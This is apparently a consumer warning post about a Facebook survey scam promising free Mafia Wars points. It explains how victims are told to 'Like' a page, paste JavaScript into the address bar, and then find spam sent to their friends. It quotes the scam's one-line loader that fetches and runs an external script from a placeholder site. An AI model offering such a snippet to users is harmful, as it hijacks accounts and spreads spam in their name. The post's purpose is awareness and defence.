Have you been getting massive amounts of invites to the latest Mafia Wars glitch that gets you 1000 free points?
This is just another Survey Scam, so BEWARE!
This Event or wall post will direct you
to a Fan Page that requires a “Like”.
Clue #1 that this is already a scam!
If anything requires a like to unlock content is bogus.
Once you are at this fan page, and have liked the page in order to continue… You must do Another step?
You are already jumping through hoops, and now you have to copy and paste “unknown” javascript code to execute into your browser URL?
You are given copy and paste instructions to post to your URL.
Clue #2 that this is a Scam!
Exploit code… javascript:a=b=document).createElement(‘script’)).src=’//(SomeRandomSite).info/e.js’,b.body.appendChild(a);void(0)
This is a Javascript code that will execute an External .js file from some random Scammers site.
Now if you place this into a new tab, nothing happens. You have to be on Facebook for it to run.
So what happens when you run it?
Apparently nothing exciting for 5 minutes to you, as it asks you to “wait”. A white screen with wait instruction that says you can click a link if you feel you have waited too long.
When the script has run it’s course you are directed to a “Survey for Verification” over what appears to be a Mafia Wars page framed in a Facebook page.
Look at the URL… It has nothing to do with Facebook, or Mafia Wars at all!
So what did the script do?
Well while you were waiting that whole time. It has Created an event, Invited ALL your friends, posted messages on their walls, and sent inbox messages as well.
Spamming any which way it can to spread the link to the bogus page.
End result after the survey?
You’ve been SCAMMED!
No 1000 points, no prize, just spam in your name!
If you fell victim, how to clean it up?…
End the event, and remove all posts regarding or linking to the scammers page.
How do you prevent these invites?
Well you don’t, aside from removing the user from your friends list that is.
Report the event, and remove it. Tell your friend that they are a victim of a scam, and direct them here.
Share this article, so that your friends are aware that this is a scam, and should be avoided at all costs.
Because Knowledge is half the battle right?
Cheers, and keep up the fight against scams!
